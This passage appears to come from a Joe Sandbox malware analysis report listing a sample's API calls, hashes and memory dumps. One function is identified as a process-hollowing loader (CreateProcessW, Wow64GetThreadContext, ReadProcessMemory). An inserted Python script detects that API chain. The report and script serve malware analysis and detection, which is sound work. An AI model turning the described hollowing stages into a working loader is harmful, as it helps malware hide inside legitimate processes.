                                                      • Opcode ID: 1342e24205fffa63b6142138501ae720455a20c905fd218755f02880085bd0a5
                                                      • Instruction ID: a667ffd1285a72f3d7008811d952a019e1fd43fbcab91ce0e13827c0dcfcde5a
                                                      • Opcode Fuzzy Hash: 1342e24205fffa63b6142138501ae720455a20c905fd218755f02880085bd0a5
                                                      • Instruction Fuzzy Hash: 9551BE31D00249EBEF11EBA4C815BEFBB79EF58300F004599E609BB2D0D6795B85CBA5

                                                      Control-flow Graph

                                                      • Function start: 00E33B1C (interactive control-flow graph view not reproduced)
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B40
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B61
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 6f62645042fef81cf88f349385afdeb01e827d8175e5c58300968d3bb3828a36
                                                      • Instruction ID: 4c958ef63c8fd51a11b97ab6266fb044bf22f6c06ffcf3074815e314cd049ac8
                                                      • Opcode Fuzzy Hash: 6f62645042fef81cf88f349385afdeb01e827d8175e5c58300968d3bb3828a36
                                                      • Instruction Fuzzy Hash: 651127B5610208FFDB208FA5DC89EEEBBB9EF04744F10946AF805E7110E2319E45DBA0

Control-flow Graph
• Blocks 1487fc0-1488b83; CreateProcessW at 1488753-1488780, Wow64GetThreadContext at 14887fc-1488816, ReadProcessMemory at 148881d-1488838, Wow64SetThreadContext at 1488aa8-1488ac7; internal calls to 148a430, 1489ab0, 1489a00, 1489bf0, 148a450, 1489600, 1489930.
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0148877B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01488811
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01488833
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                      • Instruction ID: 4545804215939f38ece5e646258ddc520e26ba89e8e66002535de5a115174789
                                                      • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                      • Instruction Fuzzy Hash: 41621C30A14259DBEB24DFA4C840BDEB772EF58300F5091A9D20DEB3A0E7759E81CB59
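The three calls listed for the function at 1487fc0 (CreateProcessW, then Wow64GetThreadContext with 00010007, then a 4-byte ReadProcessMemory), together with the Wow64SetThreadContext call that appears in the same function's control-flow graph, are the stages of a RunPE-style process-hollowing loader: start a child process, take its primary thread's context, read and rewrite the child's memory, and hand a modified context back. The Python below is an added example, not Joe Sandbox code and not code from the sample: it parses the report's own "APIs" bullet lines and flags a function whose calls cover the create, get-context and remote-memory stages, using the lines above and the SwapMouseButtons registry function from this report as inputs. The stage table, the reading of the Wow64GetThreadContext argument 00010007 as the CONTEXT struct's ContextFlags field (0x10007 is CONTEXT_FULL for x86; that Joe Sandbox printed the dereferenced first DWORD is an assumption), and the choice not to require SetThreadContext in the same function are this example's own.

```python
"""Flag a RunPE / process-hollowing API chain in Joe Sandbox "APIs" lines.

Added example, not part of the Joe Sandbox report or of the sample. It parses
the bullet lines Joe Sandbox prints under "APIs" for each function
("• Name.MODULE(args), ref: ADDR") and reports which stages of a hollowing
loader one function covers. The stage table is this example's heuristic.
"""
import re
from typing import Dict, List, NamedTuple, Set

# One "APIs" bullet; also accepts lines without an argument list
# ("OleInitialize.OLE32 ref: ...") and the "Part of subcall function" prefix.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


class ApiCall(NamedTuple):
    name: str
    module: str
    args: List[str]   # raw argument strings; "?" means the sandbox could not resolve it
    ref: int          # call-site address


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the API calls in an "APIs" block, ordered by call-site address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # "APIs"/"Strings" headers and blank lines
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return sorted(calls, key=lambda c: c.ref)


# Stage -> APIs that implement it. The Wow64* variants are what a 32-bit
# loader uses on a 32-bit child when running under WOW64 on a 64-bit host.
HOLLOWING_STAGES: Dict[str, Set[str]] = {
    "create": {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "get_context": {"GetThreadContext", "Wow64GetThreadContext"},
    "remote_memory": {"ReadProcessMemory", "WriteProcessMemory",
                      "NtUnmapViewOfSection", "VirtualAllocEx"},
    "set_context": {"SetThreadContext", "Wow64SetThreadContext"},
    "resume": {"ResumeThread", "NtResumeThread"},
}

# x86 CONTEXT flag bits from winnt.h; CONTEXT_i386 | 0x7 == CONTEXT_FULL.
CONTEXT_I386 = 0x00010000
CONTEXT_BITS = {0x1: "CONTROL", 0x2: "INTEGER", 0x4: "SEGMENTS", 0x8: "FLOATING_POINT",
                0x10: "DEBUG_REGISTERS", 0x20: "EXTENDED_REGISTERS"}


def hollowing_stages(calls: List[ApiCall]) -> List[str]:
    """Stages of the chain present in this function, in call-site order."""
    seen: List[str] = []
    for call in calls:
        for stage, names in HOLLOWING_STAGES.items():
            if call.name in names and stage not in seen:
                seen.append(stage)
    return seen


def is_hollowing_candidate(calls: List[ApiCall]) -> bool:
    """Create + get-context + remote-memory in one function is enough to flag.
    SetThreadContext/ResumeThread often sit in a helper the report lists
    separately, so they raise confidence but are not required."""
    return {"create", "get_context", "remote_memory"} <= set(hollowing_stages(calls))


def decode_context_flags(value: int) -> List[str]:
    """Name the CONTEXT_* parts an x86 ContextFlags value requests."""
    if (value & CONTEXT_I386) != CONTEXT_I386:
        return []
    return [name for bit, name in CONTEXT_BITS.items() if value & bit]


def analyse(text: str) -> dict:
    """Parse one function's "APIs" block and summarise the hollowing evidence."""
    calls = parse_api_lines(text)
    flags: List[str] = []
    for c in calls:
        # Assumption: for (Wow64)GetThreadContext the report prints the first
        # DWORD of the CONTEXT struct behind lpContext, i.e. ContextFlags.
        if c.name in HOLLOWING_STAGES["get_context"] and len(c.args) > 1 and c.args[1] != "?":
            flags = decode_context_flags(int(c.args[1], 16))
    return {"calls": [c.name for c in calls], "stages": hollowing_stages(calls),
            "candidate": is_hollowing_candidate(calls), "context_flags": flags}


# Copied from this report: the function at 1487fc0 and, for contrast, e33b1c.
HOLLOWING_APIS = r"""
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0148877B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01488811
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01488833
"""
REGISTRY_APIS = r"""
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B40
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B61
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00E33B0F,SwapMouseButtons,00000004,?), ref: 00E33B83
"""

if __name__ == "__main__":
    for label, block in (("1487fc0", HOLLOWING_APIS), ("e33b1c", REGISTRY_APIS)):
        r = analyse(block)
        print(f"{label}: candidate={r['candidate']} stages={r['stages']} ctx={r['context_flags']}")
```

Run as a script it prints one verdict per function; `analyse()` returns the stage list so the same check can be run over every "APIs" block in the report and the candidates cross-referenced with the behaviour signatures in the overview. The 4-byte ReadProcessMemory size is consistent with a loader reading the child's PEB ImageBaseAddress pointer before unmapping and rewriting the image, but the report does not show the address read, so the example does not assert that.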
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00E832B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: 7de5ddec63003b66e26d695cb37dc4a4dc009491a69a9d4a413f86e21ce95f09
                                                      • Instruction ID: df75ce2a9bc60057661a3ef3e9203b6546253b97306c65460ff3b9f429db447f
                                                      • Opcode Fuzzy Hash: 7de5ddec63003b66e26d695cb37dc4a4dc009491a69a9d4a413f86e21ce95f09
                                                      • Instruction Fuzzy Hash: 88C28B71A00204CFCB24DF68C889AADBBF1BF08714F249569E95ABB391D375ED41CB91

Control-flow Graph
• Blocks e33923-e33a17 and e73393-e73409; LoadStringW at e73393-e733a2, Shell_NotifyIconW at e33994-e33a0e; internal calls to e36270, e36b57, e36350, e33fcf, e52340, e33a18, e54983, e3988f, e3a8c7, e333c6.
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E733A2
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E33A04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                      • String ID: Line:
                                                      • API String ID: 2289894680-1585850449
                                                      • Opcode ID: e883b25ae2f3f0d25798b74a984da329bf5ded5d6f83dc534eeac8c643cbee7b
                                                      • Instruction ID: 02239cfbc4f377713418315f272240cee5dacae34a722a99cd6d83b71b3d0846
                                                      • Opcode Fuzzy Hash: e883b25ae2f3f0d25798b74a984da329bf5ded5d6f83dc534eeac8c643cbee7b
                                                      • Instruction Fuzzy Hash: 3031A371508304ABD725EB30DC49FEBBBE8BB84714F10A92EF599A20D1DB709649D7C2
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00E72C8C
                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                        • Part of subcall function 00E32DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E32DC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen
                                                      • String ID: X$`e
                                                      • API String ID: 779396738-4036142377
                                                      • Opcode ID: ac438954e9fe67170de76f96060fc081b5e360ecb08e03b9fbc65e2809cffaad
                                                      • Instruction ID: 007e15086def16c1667be0199ef8570d80c98d4fe7a9e23bb19b41cc17a781d6
                                                      • Opcode Fuzzy Hash: ac438954e9fe67170de76f96060fc081b5e360ecb08e03b9fbc65e2809cffaad
                                                      • Instruction Fuzzy Hash: 3521A571A0025C9FDB01EF94C84ABEEBBF8AF49304F009059E649B7241DBB45A49CFA1
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E50668
                                                        • Part of subcall function 00E532A4: RaiseException.KERNEL32(?,?,?,00E5068A,?,00F01444,?,?,?,?,?,?,00E5068A,00E31129,00EF8738,00E31129), ref: 00E53304
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E50685
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: 0017fb9efa5d64f1a946c15cf05a39a2a0e721516655645b26f6dcf143aac419
                                                      • Instruction ID: 384043b9b05d9277f44fdd4d252c128d89441c94e80afe573df04d62da25c612
                                                      • Opcode Fuzzy Hash: 0017fb9efa5d64f1a946c15cf05a39a2a0e721516655645b26f6dcf143aac419
                                                      • Instruction Fuzzy Hash: D3F0FF3490020D638B00BAB4E846EAE7BAC5E00345B606931FD14F69E2EFB1DA6DC580
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00EB82F5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00EB82FC
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00EB84DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                      • String ID:
                                                      • API String ID: 146820519-0
                                                      • Opcode ID: af9f4f3589183d74690c8f4d1525dd557ed2187a4f67b965491043b67b991ef5
                                                      • Instruction ID: 73e343e199789627a27a9b49a697ff48d44e0c3513f02beb2376a8e46764edcc
                                                      • Opcode Fuzzy Hash: af9f4f3589183d74690c8f4d1525dd557ed2187a4f67b965491043b67b991ef5
                                                      • Instruction Fuzzy Hash: FA128C71A083019FC714DF28C584B6ABBE5BF88318F14995DE899AB352CB31ED45CF92
                                                      APIs
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E31BF4
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E31BFC
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E31C07
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E31C12
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E31C1A
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E31C22
                                                        • Part of subcall function 00E31B4A: RegisterWindowMessageW.USER32(00000004,?,00E312C4), ref: 00E31BA2
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E3136A
                                                      • OleInitialize.OLE32 ref: 00E31388
                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00E724AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: 13e04d90d11cbbf614d2090259f29007b13d682a1259b4862e25ec432500765f
                                                      • Instruction ID: b9522a073e9df935f42b489f43975a7f88ff79bf152d2e53e701f93a5e5cabcc
                                                      • Opcode Fuzzy Hash: 13e04d90d11cbbf614d2090259f29007b13d682a1259b4862e25ec432500765f
                                                      • Instruction Fuzzy Hash: 7571CDB89013088FC794DF79AD49A657AE0FBC9344758922EE44AEB3B2EB304545FF41
                                                      APIs
                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00E685CC,?,00EF8CC8,0000000C), ref: 00E68704
                                                      • GetLastError.KERNEL32(?,00E685CC,?,00EF8CC8,0000000C), ref: 00E6870E
                                                      • __dosmaperr.LIBCMT ref: 00E68739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2583163307-0
                                                      • Opcode ID: f009efbf99cffe208b4f7ebc18eed31fcad030f26b328c3b5ba19eba0e72b6be
                                                      • Instruction ID: e29b01c60ed46ea80a8ffed698468a6251cc46e09d20e5bd1d90f4a5b653264f
                                                      • Opcode Fuzzy Hash: f009efbf99cffe208b4f7ebc18eed31fcad030f26b328c3b5ba19eba0e72b6be
                                                      • Instruction Fuzzy Hash: BC016B337C42601AC2306234FA45B7E27894B81BFCF383329F918FB2D2DEA18C819150
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00E417F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CALL
                                                      • API String ID: 1385522511-4196123274
                                                      • Opcode ID: 9075d804a4cb1e8b1ee13352f255a75311e50c7fcb8abb126d3cfb89c868adb1
                                                      • Instruction ID: f3fa0457b3f69b485de779c835fe5d8c4400bb38e743587597e5ca6168b0bbab
                                                      • Opcode Fuzzy Hash: 9075d804a4cb1e8b1ee13352f255a75311e50c7fcb8abb126d3cfb89c868adb1
                                                      • Instruction Fuzzy Hash: CC22BE706083419FCB14DF14D484B6ABBF1BF89314F18999DF49AAB361D731E885CB52
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 1af6de9f62511695ee79c4a79c71b2759b30e5139cbe146c6b87d14c9f139aba
                                                      • Instruction ID: da4810f8779eeedfa0c8707a881079e9247ceb1e0ae86782cbff775102afbce1
                                                      • Opcode Fuzzy Hash: 1af6de9f62511695ee79c4a79c71b2759b30e5139cbe146c6b87d14c9f139aba
                                                      • Instruction Fuzzy Hash: C0319370504301DFD720DF34D889B97BBE4FB49709F00192EF599A3290E771AA44DB52
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E3949C,?,00008000), ref: 00E35773
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00E3949C,?,00008000), ref: 00E74052
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: e627a3a0d605b2c538465b0c2dedd972ab4e9d854d826191a6abfd9d06bc8034
                                                      • Instruction ID: 004a5f499978aecdd2ec044fd557808b33b827f0d7609aa7b2d3c2abb0ede95a
                                                      • Opcode Fuzzy Hash: e627a3a0d605b2c538465b0c2dedd972ab4e9d854d826191a6abfd9d06bc8034
                                                      • Instruction Fuzzy Hash: 98018031145225BAE3310A2ACC0EF977F98EF027B4F148215BAAC6A1E0C7B55855CB90
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00E3BB4E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID:
                                                      • API String ID: 1385522511-0
                                                      • Opcode ID: e48f2493dcf273eb2ff1c121a581469bffc07dc1f5c049a86ad1e62c105f0dd8
                                                      • Instruction ID: 4c242e254955f00376e7cef407c5fbdfd1c659261c2420b842555f9d94fe10dd
                                                      • Opcode Fuzzy Hash: e48f2493dcf273eb2ff1c121a581469bffc07dc1f5c049a86ad1e62c105f0dd8
                                                      • Instruction Fuzzy Hash: 1B32BE30A002099FDB24DF54C898BBABBF9FF44318F14A059EA0ABB261C775AD45DB51
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0148877B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01488811
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01488833
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                      • Instruction ID: 212140ec975a0c87e3bd64e245bbc5a5e2dfc94795dcf3db7fe16bd6e6e0adfa
                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                      • Instruction Fuzzy Hash: 2812CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
